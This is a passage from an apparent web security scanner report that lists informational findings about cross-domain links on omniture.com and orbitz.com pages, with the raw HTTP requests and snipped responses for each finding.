Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:59:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 05:59:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:59:36 GMT
Content-Length: 14491
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:36 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Is Your SEO Guy Using Facebook?
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...
<strong>Chris Bennet, Founder and President,<a href="http://www.97thfloor.com/" target="blank"> 97th Floor</a>
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.331. http://www.omniture.com/offer/435 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/435

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/435?s_osc=24661

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/435?s_osc=24661 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:20:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:20:00 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:20:00 GMT
Content-Length: 13463
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:20:00 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Insight Demo | Omnitur
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.332. http://www.omniture.com/offer/462 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/462

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/462?s_osc=24656

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/462?s_osc=24656 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:04:11 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:04:11 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:04:12 GMT
Content-Length: 14122
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:04:11 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Recommendations: Promo
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.333. http://www.omniture.com/offer/892 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/892

Issue detail

The page was loaded from a URL containing a query string:

http://www.omniture.com/offer/892?s_osc=24663

The response contains the following links to other domains:

http://feeds.feedburner.com/omniture/blogs/all
http://leads.demandbase.com/204595ns.gif
http://omniturecom.112.2o7.net/b/ss/omniturecom/5/H.20.3--WAP?

Request

GET /offer/892?s_osc=24663 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 06:00:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Thu, 03 Feb 2011 06:00:27 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 06:00:27 GMT
Content-Length: 14043
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:00:27 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Timex uses Omniture SearchCente
...[SNIP]...
<meta name="verify-v1" content="T5wn84R+6GRfeeLpvX8NHaowkKpDXFwYZmkEBhkD9V4=" />

   <link rel="alternate" type="application/rss+xml" title="Insight. Action. Uplift. The Omniture Blog." href="http://feeds.feedburner.com/omniture/blogs/all" />
   <link rel="shortcut icon" href="http://assets.omniture.com/global/images/general/favicon.ico" />
...[SNIP]...

           <img src="http://omniturecom.112.2O7.net/b/ss/omniturecom/5/H.20.3--WAP?" height="5" width="5" border=0 />
           
...[SNIP]...
<noscript>
           <img alt="Demandbase Connect" width="1" height="1" src="http://leads.demandbase.com/204595ns.gif" />
       </noscript>
...[SNIP]...

17.334. http://www.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/?z=2eaf&r=2

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://facebook.com/orbitz
http://outsideonline.com/
http://twitter.com/orbitz
http://www.away.com/
http://www.cheaptickets.com/
http://www.ebookers.com/
http://www.facebook.com/Orbitz
http://www.facebook.com/orbitz
http://www.google.com/jsapi
http://www.gorp.com/
http://www.hotelclub.com/
http://www.lodging.com/
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzforbusiness.com/homepage_asset
http://www.orbitzforbusiness.com/homepage_footer
http://www.orbitzgames.com/
http://www.ratestogo.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=60&width=468&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=90&width=728&adType=noframe&
http://www.trip.com/
http://www.twitter.com/orbitz

Request

GET /?z=2eaf&r=2 HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=C8E3D924D0E7C57B9F0BABC73B5602CF; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:04:25 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 175716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad468x60_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=60&width=468&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=60&width=468&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=60&width=468&adType=noframe&" height="60" width="468" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad hotelTelesalesAd">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&" height="null" width="null" border="0"></a>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=225&rotator=true&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&"></script>
...[SNIP]...
<li class="twitterLogo"><a href="http://www.twitter.com/orbitz" target="_blank" rel="nofollow">Follow us on Twitter</a>
...[SNIP]...
<li class="facebookLogo"><a href="http://www.facebook.com/orbitz" target="_blank" rel="nofollow">Become a fan on Facebook</a>
...[SNIP]...
<div class="corpHPModule homeMod">
        <a class="corpLogoLink" href="http://www.orbitzforbusiness.com/homepage_asset" rel="nofollow"><img src="/img/business/business_logo_109x30.gif" width="109" height="30"/>
...[SNIP]...
<span>Control costs without sacrificing service  |  <a href="http://www.orbitzforbusiness.com/homepage_asset" rel="nofollow">Learn more</a>
...[SNIP]...
</a> to make sure you get first crack at the best offers. You also can follow us on <a href="http://twitter.com/orbitz" rel="nofollow">Twitter</a> and <a href="http://facebook.com/orbitz" rel="nofollow">Facebook</a>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662665460&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li>Book flights and <a href="http://www.cheaptickets.com">cheap hotels</a>
...[SNIP]...
<li>Find <a href="http://www.hotelclub.com">Hotel Deals</a>
...[SNIP]...
<li><a href="http://www.ratestogo.com">Last Minute Hotel Deals</a>
